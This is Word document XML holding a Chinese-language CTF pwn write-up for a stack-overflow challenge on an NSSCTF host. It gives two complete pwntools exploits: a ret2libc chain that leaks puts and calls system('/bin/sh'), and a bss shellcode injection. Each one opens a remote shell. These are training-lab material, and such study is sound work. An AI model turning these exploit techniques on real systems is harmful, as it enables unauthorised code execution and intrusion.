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39C" w14:textId="1C55B0A3" w:rsidR="002E4B5A" w:rsidRDefault="002E4B5A" w:rsidP="002E4B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Checksec一下文件，发现是全关，是个好消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F50DDB1" w14:textId="596913FB" w:rsidR="002E4B5A" w:rsidRDefault="002E4B5A" w:rsidP="002E4B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放到64位ida里面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDE6EFA" w14:textId="4BD13D75" w:rsidR="002E4B5A" w:rsidRDefault="002E4B5A" w:rsidP="002E4B5A">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看主函数</w:t>
      </w:r>
      <w:r w:rsidRPr="002E4B5A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="352F947C" wp14:editId="0189C1D3">
            <wp:extent cx="5274310" cy="1682750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="130647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74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53D0" w14:textId="66436554" w:rsidR="002E4B5A" w:rsidRDefault="002E4B5A" w:rsidP="002E4B5A">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shift+f12</w:t>
      </w:r>
      <w:r w:rsidRPr="002E4B5A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42932AF2" wp14:editId="060C1E5B">
            <wp:extent cx="5274310" cy="2416810"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="466922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2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DEEB" w14:textId="374F987E" w:rsidR="002E4B5A" w:rsidRDefault="002E4B5A" w:rsidP="002E4B5A">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我只看到了gets可以被溢出，但是没有/bin/sh或者int80或者execeve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13477835" w14:textId="4E4398CE" w:rsidR="00C9199C" w:rsidRDefault="00C9199C" w:rsidP="00C9199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然后我的想法是用libc来调用/bin/sh函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4F1FDA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6F85DEE3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14:paraId="7DC48B7E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context(os='linux', arch='amd64', log_level='debug')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782869AA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416A9991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#p = process('./pwn')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31921E6D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 = remote('node4.anna.nssctf.cn',28499)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA611C4" w14:textId="42654F26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elf = ELF('pwn')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770461B1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7E24CD2A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#gdb.attach(p, 'b *0x4006a9')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DFCCDA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plt_addr =elf.sym['puts']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C2A620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got_addr =elf.got['puts']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6C1F25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main_addr =0x400636</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F3C2A7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ret_addr =0x4004c9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467F764E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rdi_addr =0x400713</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EA6F12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name_addr =0x601080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B3CC20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0AAA9F27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p.sendafter(b'name\n', b'1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA83F22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278ADC63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payload =b'a'*(0x20 +8) +p64(rdi_addr) +p64(got_addr) +p64(plt_addr) +p64(main_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15357E0F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p.sendlineafter(b'me?\n', payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4031D2DA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5272C106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puts_addr =u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1763D621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libc =LibcSearcher('puts',puts_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1A6662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libc_base =puts_addr -libc.dump('puts')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD6B8DC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system =libc_base + libc.dump('system')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077EA21F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201E3CB5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p.sendafter(b'name\n', b'/bin/sh\x00')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430B9D22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payload =b'a'*(0x20 +8) +p64(ret_addr) +p64(rdi_addr) +p64(name_addr) +p64(system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F97EFBA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72D48C42" w14:textId="77777777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p.sendlineafter(b'me?\n',payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056EE12B" w14:textId="5F15AA13" w:rsidR="00A41154" w:rsidRDefault="00A41154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p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46462FF0" w14:textId="70DAB581" w:rsidR="00907649" w:rsidRDefault="00C509AB" w:rsidP="00A41154">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C509AB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45B2DE95" wp14:editId="10E308F1">
            <wp:extent cx="5016500" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29832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F92D" w14:textId="09986666" w:rsidR="00C9199C" w:rsidRDefault="00C9199C" w:rsidP="00C9199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然后我才发现有一种更简单的方法，他不是保护都没开吗，就可以自己手搓一个/bin/sh来用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6540254A" w14:textId="77777777" w:rsidR="0049239C" w:rsidRDefault="0049239C" w:rsidP="0049239C">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6D16BB" w14:textId="03CFA60A" w:rsidR="0049239C" w:rsidRDefault="0049239C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context(arch='amd64',os='linux',log_level='debug')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B8B957" w14:textId="11CC280D" w:rsidR="0049239C" w:rsidRDefault="0049239C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io =remote('node4.anna.nssctf.cn',28499)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AB15D4" w14:textId="77777777" w:rsidR="0049239C" w:rsidRDefault="0049239C" w:rsidP="0049239C">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shellcode =asm(shellcraft.sh())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A46E36" w14:textId="414EFEBC" w:rsidR="0049239C" w:rsidRDefault="0049239C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io.sendlineafter(b'tell me your name\n',shellcode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F24DA32" w14:textId="77777777" w:rsidR="0049239C" w:rsidRDefault="0049239C" w:rsidP="0049239C">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>name =0x601080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334B7217" w14:textId="314B48F7" w:rsidR="0049239C" w:rsidRDefault="0049239C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payload =b'a'*(0x20 +8) +p64(name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62806FE7" w14:textId="51E1DB7A" w:rsidR="0049239C" w:rsidRDefault="0049239C" w:rsidP="00A41154">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>io.recvuntil(b'What do you want to say to me?\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7451E607" w14:textId="77777777" w:rsidR="0049239C" w:rsidRDefault="0049239C" w:rsidP="0049239C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io.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37783E" w14:textId="699A898B" w:rsidR="0049239C" w:rsidRDefault="0049239C" w:rsidP="0049239C">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>io.interactive()</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="77E29D71" w14:textId="3E44C9EC" w:rsidR="0049239C" w:rsidRPr="00907649" w:rsidRDefault="0049239C" w:rsidP="0049239C">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释一下为什么要跳转到name，一开始我也没看懂为什么要跳到name，但是我们需要在bss段上构造shellcode</w:t>
      </w:r>
      <w:r w:rsidR="00D005F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这里有个问题就是nx开了后栈上是不可执行的，但这道题没开为什么不能放到栈上写shellcode，因为栈的地址是会变化的而bss段是固定的，所以在bss段上更稳定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我们要找一个地址他的权限全开</w:t>
      </w:r>
      <w:r w:rsidR="00D005F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vmma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p一下</w:t>
      </w:r>
      <w:r w:rsidR="00907649" w:rsidRPr="00907649">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FF50599" wp14:editId="0E0B4091">
            <wp:extent cx="5143500" cy="2463800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2034118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649">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个0x601000应该是有x权限的但我不知道为啥不显示</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0049239C" w:rsidRPr="00907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AEE1" w14:textId="77777777" w:rsidR="00FF222C" w:rsidRDefault="00FF222C" w:rsidP="00C509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95803E" w14:textId="77777777" w:rsidR="00FF222C" w:rsidRDefault="00FF222C" w:rsidP="00C509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F7AD" w14:textId="77777777" w:rsidR="00FF222C" w:rsidRDefault="00FF222C" w:rsidP="00C509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4EC4ED" w14:textId="77777777" w:rsidR="00FF222C" w:rsidRDefault="00FF222C" w:rsidP="00C509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866A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A4D64BB6"/>
    <w:lvl w:ilvl="0" w:tplc="0B8E898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558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5A"/>
    <w:rsid w:val="00255D0F"/>
    <w:rsid w:val="002E4B5A"/>
    <w:rsid w:val="0049239C"/>
    <w:rsid w:val="00907649"/>
    <w:rsid w:val="00A41154"/>
    <w:rsid w:val="00C509AB"/>
    <w:rsid w:val="00C9199C"/>
    <w:rsid w:val="00D005F8"/>
    <w:rsid w:val="00D4011D"/>
    <w:rsid w:val="00F8613A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2CA17"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8D4C7A3D-9F27-403C-B32D-6476AAFC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4B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B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B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B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B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B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B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B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B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B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B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4B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B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B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B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B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B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B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B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B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B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B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4B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09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09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09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09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311</Words>
  <Characters>1229</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>53</Lines>
  <Paragraphs>45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2025-08-08T05:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-08T07:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>